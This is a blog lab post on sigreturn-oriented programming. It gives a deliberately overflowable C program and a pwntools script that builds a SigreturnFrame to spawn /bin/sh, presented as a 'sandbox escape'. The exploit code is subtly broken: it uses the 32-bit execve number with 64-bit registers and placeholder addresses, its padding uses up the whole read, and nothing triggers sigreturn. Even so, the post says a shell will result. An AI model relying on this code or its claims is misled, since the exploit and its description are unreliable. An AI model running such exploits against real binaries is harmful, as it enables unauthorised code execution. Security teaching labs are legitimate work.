strangerRidingCaml
Sigreturn-Oriented Programming (SROP) Lab 본문
728x90
Sigreturn-Oriented Programming (SROP) Lab
In this lab, we will learn how to develop SROP exploits for sandbox escape.
Lab Activities:
1. Creating Vulnerable C Program:
First, let's create a vulnerable C program with a syscall instruction.
#include <stdio.h>
#include <unistd.h>
int main() {
char buf[10];
read(0, buf, 100); // Vulnerable syscall
return 0;
}
Save the above code to a file named vulnerable.c
and compile it with the following command:
$ gcc -o vulnerable vulnerable.c
2. Writing Exploit Script:
Now, let's write an exploit script in Python using pwntools to perform SROP for sandbox escape.
from pwn import *
# Specify the path to the vulnerable binary
binary_path = './vulnerable'
# Build the SROP frame
srop_frame = SigreturnFrame()
srop_frame.rax = 0x0b # execve syscall number
srop_frame.rdi = 0xdeadbeef # Address of "/bin/sh"
srop_frame.rsi = 0x0
srop_frame.rdx = 0x0
srop_frame.rip = 0x4000000 # Address of syscall instruction
# Craft the payload
payload = b'A' * 100 # Padding
payload += bytes(srop_frame)
# Launch the exploit
p = process(binary_path)
p.send(payload)
p.interactive()
Explanation of the Python script:
- We build a SigreturnFrame object to construct the SROP frame.
- The SROP frame sets the syscall number for execve, the arguments, and the address of the syscall instruction.
- We craft the payload with padding and the SROP frame.
- We launch the
vulnerable
binary and send the payload to perform the SROP exploit. p.interactive()
allows us to interact with the spawned shell.
3. Exploiting the Vulnerability:
Execute the Python script to exploit the vulnerability:
$ python exploit.py
Once executed, you should have a shell prompt, confirming the successful sandbox escape using SROP.
'System hacking' 카테고리의 다른 글
Race Condition Exploits Lab (0) | 2024.05.08 |
---|---|
Blind Return-Oriented Programming (BROP) Lab (0) | 2024.05.08 |
Return-Oriented Programming (ROP) Lab (0) | 2024.05.07 |
Frame Pointer Overwrite Attacks Lab (0) | 2024.05.07 |
Frame Faking and Fake EBP Lab (0) | 2024.05.07 |